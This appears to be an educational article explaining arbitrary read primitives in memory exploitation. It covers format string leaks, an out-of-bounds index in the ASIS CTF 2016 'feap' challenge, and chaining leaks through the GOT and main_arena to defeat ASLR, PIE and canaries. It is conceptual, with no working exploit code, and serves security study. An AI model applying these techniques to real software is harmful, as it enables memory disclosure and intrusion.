Arbitrary read primitives
An arbitrary read primitive is a condition in which the attacker can read any location within a process's virtual memory. A close formal definition for this condition provided by the Common Weakness Enumeration (CWE) list is Untrusted Pointer Dereference. This definition describes a condition for a program in which it will dereference the value of any pointer provided, whether it be from a trusted or untrusted source. An attacker can find usefulness from this condition if the program prints the content of the pointer provided. Below are some examples of how an attacker can implement or utilize an arbitrary read primitive present within a program.
Use of Externally-Controlled Format String
Just like in our Arbitrary write primitives discussion, we note that a format string vulnerability is not a condition that is implemented by an attacker, it's just present due to programmer error. The condition itself, however, is still useful for an attacker to arbitrarily read memory from any location in the process, given the right conditions.
Like our previous discussion, the attacker can provide an address in their
forged format string in order to place that address onto the stack for their
vulnerable printf()
call. Also like our previous discussion, the attacker
must know the offset of their placed address on the stack during the call to
printf()
. Unlike our previous discussion, the attacker will have to use
different format string identifiers in order to print the contents of the
address they placed onto the stack. The most commonly used format string
identifiers used by attackers to dump information from memory are:
p
-void*
x
-unsigned int
s
-null terminated string
Use of Out-of-range Pointer Offset
This particular condition is a child of Improper Restriction of Operations within the Bounds of a Memory Buffer, however, I feel like this is more applicable to this discussion about arbitrary read primitives. The most important portion of this condition's Extended Description is the statement:
If an attacker can control or influence the offset so that it points outside of the intended boundaries of the structure, then the attacker may be able to read or write to memory locations that are used elsewhere in the program.
For our discussion, we're interested in the implementation of an arbitrary read
primitive using the condition described above. A good example of implementing
an arbitrary read primitive is the feap
challenge from
ASIS CTF Quals 2016. The arbitrary read primitive for this
challenge exists in the print_note
function of the vulnerable executable. The
print_note
function conducts no bounds checking when indexing into the
notes
array, allowing the attacker to provide array indices that are outside
the bounds of the notes
array. This ultimately leads to the program treating
these out of bounds locations as note
structures, and attempts to call
printf()
on what it believes to be a note
's title
attribute.
Coincidentally, the note_sizes
array resides directly below the notes
array
that the attacker is able to read past. The attacker is able to forge a valid
pointer in memory in the note_sizes
array by creating a note of a particular
size: their target address - 0x40
(to account for the bytes added by the
program). The attacker then reads past the notes
array and fools the program
into calling printf()
on the valid memory address contained within
note_sizes
- the program thinks this pointer offset is a valid note
struct.
This condition in this CTF challenge provides the attacker the ability to
implement an arbitrary read primitive.
So what are arbitrary read primitives good for?
Attackers most commonly use arbitrary read primitives to leak sensitive
program information, allowing them to bypass mitigations such as ASLR, PIE,
stack canaries, and possibly even pointer mangling. If the attacker can conduct
an arbitrary read of data from the stack, they will most likely be able to
expose glibc
and program pointers or return addresses stored on the stack,
allowing them to calculate the base addresses for the glibc
and program
segments in the process's virtual memory mapping. Attackers would also have an
interest in leaking heap pointer information in order to derive the base of the
heap in memory, especially if their method of gaining code execution is via a
heap memory corruption vulnerability.
Conclusion
An arbitrary read primitive is only useful if an attacker knows what information they want and where to get it. Attackers must also know how to use an initial exposure to guide succeeding exposures - you won't always know the exact address of your arbitrary read target, and you might need to expose the contents of other data structures in memory in order to find it.
Take for example a vulnerable non-PIE binary where an attacker can implement an
arbitrary read primitive. The attacker doesn't know where the stack is, but
they do know the location of the Global Offset Table (GOT), allowing them to
leak glibc
information for functions that have been called and their address
within glibc
resolved - from here an attacker can now derive the base of
glibc
in process memory. Now knowing the base of glibc
in memory, if the
attacker wished to locate the base of the heap, they would be able to target
the main_arena
in glibc
. Using the main_arena
, the attacker can leak the
location of one of the bins, allowing them the ability to derive the base of
the heap in memory. The usefulness of an arbitrary read primitive relies on
its user's understanding of the state of the process when the primitive is
implemented and the user's knowledge of where important data structures are
stored in process memory.